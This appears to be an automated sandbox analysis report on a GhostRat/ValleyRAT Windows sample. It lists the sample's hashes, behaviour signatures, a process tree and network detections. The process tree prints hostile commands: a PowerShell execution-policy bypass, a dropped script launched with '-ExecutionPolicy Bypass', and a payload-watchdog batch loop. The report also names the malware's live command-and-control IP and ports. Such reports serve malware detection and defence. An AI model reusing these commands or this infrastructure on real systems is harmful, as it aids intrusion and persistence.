Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ErbgterT2R.exe

Overview

General Information

Sample name:ErbgterT2R.exe
renamed because original name is a hash value
Original sample name:14DFEC5B51C4D87EACAB495AD216EB7C.exe
Analysis ID:1584889
MD5:14dfec5b51c4d87eacab495ad216eb7c
SHA1:fab7846b458694aecabf6770673615ae90493b5e
SHA256:b86af545e9a2f86c05538eb7fcb85cf63085a0730925a9587253d46590a4e4e9
Tags:exeValleyRATuser-abuse_ch
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ErbgterT2R.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\ErbgterT2R.exe" MD5: 14DFEC5B51C4D87EACAB495AD216EB7C)
    • cmd.exe (PID: 7604 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Update.exe (PID: 7652 cmdline: C:\Users\Public\Bilite\Axialis\Update.exe MD5: FB325C945A08D06FE91681179BDCCC66)
        • cmd.exe (PID: 4592 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 3756 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2144 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2840 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3452 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5800 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7804 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3152 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6504 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 4336 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2724 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3964 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 8008 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 6452 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7284 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6036 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7196 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

Threatname: GhostRat

{"C2 url": ["134.122.155.39:15091", "134.122.155.39:15092"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.2585756688.00000000005E3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000003.00000003.2921881516.0000000004691000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000003.00000003.3251872110.0000000004691000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000003.00000002.3564033728.0000000003000000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000003.00000003.3080679847.0000000004691000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.Update.exe.469260b.6.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              3.2.Update.exe.30405bf.4.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                3.2.Update.exe.34e0000.6.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  3.2.Update.exe.469260b.7.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    3.3.Update.exe.469260b.8.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      Click to see the 29 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\Update.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\Update.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\Update.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7604, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ProcessId: 7652, ProcessName: Update.exe
                      Sigma detected: Parent in Public Folder Suspicious Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Users\Public\Bilite\Axialis\Update.exe, ParentProcessId: 7652, ParentProcessName: Update.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 6452, ProcessName: cmd.exe
                      Sigma detected: Suspicious Program Location with Network Connections
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 134.122.155.39, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\Update.exe, Initiated: true, ProcessId: 7652, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49900
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6036, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, ProcessId: 7196, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6036, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, ProcessId: 7196, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-06T17:48:56.323252+010020528751A Network Trojan was detected192.168.2.449922134.122.155.3915091TCP
                      2025-01-06T17:50:05.766655+010020528751A Network Trojan was detected192.168.2.449940134.122.155.3915091TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: Update.exe.7652.3.memstrminMalware Configuration Extractor: GhostRat {"C2 url": ["134.122.155.39:15091", "134.122.155.39:15092"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\Public\Bilite\Axialis\Update.dllReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\backup.dllReversingLabs: Detection: 47%
                      Multi AV Scanner detection for submitted file
                      Source: ErbgterT2R.exeReversingLabs: Detection: 36%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C376EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C376EB0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C376720 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C376720
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C376520 CryptStringToBinaryA,CryptStringToBinaryA,___std_exception_copy,3_2_6C376520
                      Source: ErbgterT2R.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2639809888.000000000785C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb77 source: powershell.exe, 00000012.00000002.2646019166.000000000899B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2641443881.000000000790F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\MFCLibrary_YSS\Release\Update.pdb source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp, Update.dll.0.dr
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1811668541.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr, backup.exe.3.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2645678800.000000000896C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2646365604.00000000089D1000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1811668541.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr, backup.exe.3.dr
                      Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: 360inst_install.exe.0.dr
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: z:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: x:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: v:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: t:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: r:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: p:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: n:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: l:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: j:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: h:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: f:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: b:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: y:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: w:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: u:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: s:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: q:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: o:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: m:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: k:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: i:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: g:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: [:Jump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C39F888 FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6C39F888
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C39F7D7 FindFirstFileExW,3_2_6C39F7D7
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_034E80F0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49922 -> 134.122.155.39:15091
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49940 -> 134.122.155.39:15091
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 134.122.155.39:15091
                      Source: Malware configuration extractorURLs: 134.122.155.39:15092
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 134.122.155.39 ports 18852,15091,1,2,5,8
                      Source: global trafficTCP traffic: 192.168.2.4:49900 -> 134.122.155.39:18852
                      Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: unknownTCP traffic detected without corresponding DNS query: 134.122.155.39
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E3360 recv,timeGetTime,_memmove,3_2_034E3360
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://123.com/
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://360.cn
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 00000012.00000002.2631490282.0000000003211000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2631914277.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
